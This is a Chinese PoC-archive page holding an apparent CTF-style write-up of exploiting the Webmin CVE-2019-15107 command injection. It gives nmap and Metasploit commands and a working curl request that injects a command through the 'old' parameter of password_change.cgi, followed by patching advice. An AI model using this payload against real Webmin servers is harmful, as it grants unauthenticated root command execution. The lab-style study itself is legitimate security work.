关联漏洞
标题:
Webmin 命令操作系统命令注入漏洞
(CVE-2019-15107)
描述:Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令操作系统命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。
描述
Research Objective: To conduct a comprehensive analysis and successful exploitation of a Remote Code Execution (RCE) vulnerability in Webmin version 1.890 (CVE-2019-15107), ultimately gaining full control over the target system.
介绍
Research Objective:
To conduct a comprehensive analysis and successful exploitation of a Remote Code Execution (RCE) vulnerability in Webmin version 1.890 (CVE-2019-15107), ultimately gaining full control over the target system.
Methodology:
Initial Reconnaissance:
Network scanning performed using Nmap:
bash
nmap -sV -sC -A -p- 10.201.105.185
Identified Webmin 1.890 service running on port 10000
Vulnerability Analysis:
Investigated the vulnerability mechanism in password_change.cgi
Confirmed the possibility of unauthenticated arbitrary command execution
Exploitation:
Implemented two attack vectors:
Using Metasploit Framework:
bash
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit
Manual exploitation via curl:
bash
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"
Post-Exploitation:
Obtained interactive root shell
Conducted filesystem analysis
Discovered flag files:
bash
/home/dark/user.txt
/root/root.txt
Findings:
Successfully exploited CVE-2019-15107 vulnerability
Gained complete root privileges on the system
Demonstrated critical importance of timely software updates
Technical Conclusions:
Vulnerability allows arbitrary command execution via "old" parameter injection
Lack of authentication checks makes this particularly dangerous
Version 1.890 contains a backdoor patched in later releases
Security Recommendations:
Immediate upgrade to current Webmin version
Restrict management panel access by IP
Regular security audits of web applications
Further Research Directions:
Analysis of other Webmin vulnerabilities
Development of custom exploit without Metasploit
Investigation of persistence techniques in compromised systems
This case study demonstrates the critical importance of timely system updates and the necessity for continuous vulnerability monitoring in deployed software. The research provides practical insights into modern web application exploitation techniques while emphasizing fundamental security principles.
文件快照
[4.0K] /data/pocs/c80c381b7c6bbc5a84282fbc8214e6dddede9f22
├── [227K] 1.jpeg
├── [ 71K] 2.jpeg
├── [149K] 3.jpeg
├── [176K] 4.jpeg
├── [179K] 5.jpeg
├── [157K] 6.jpeg
└── [2.0K] README.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。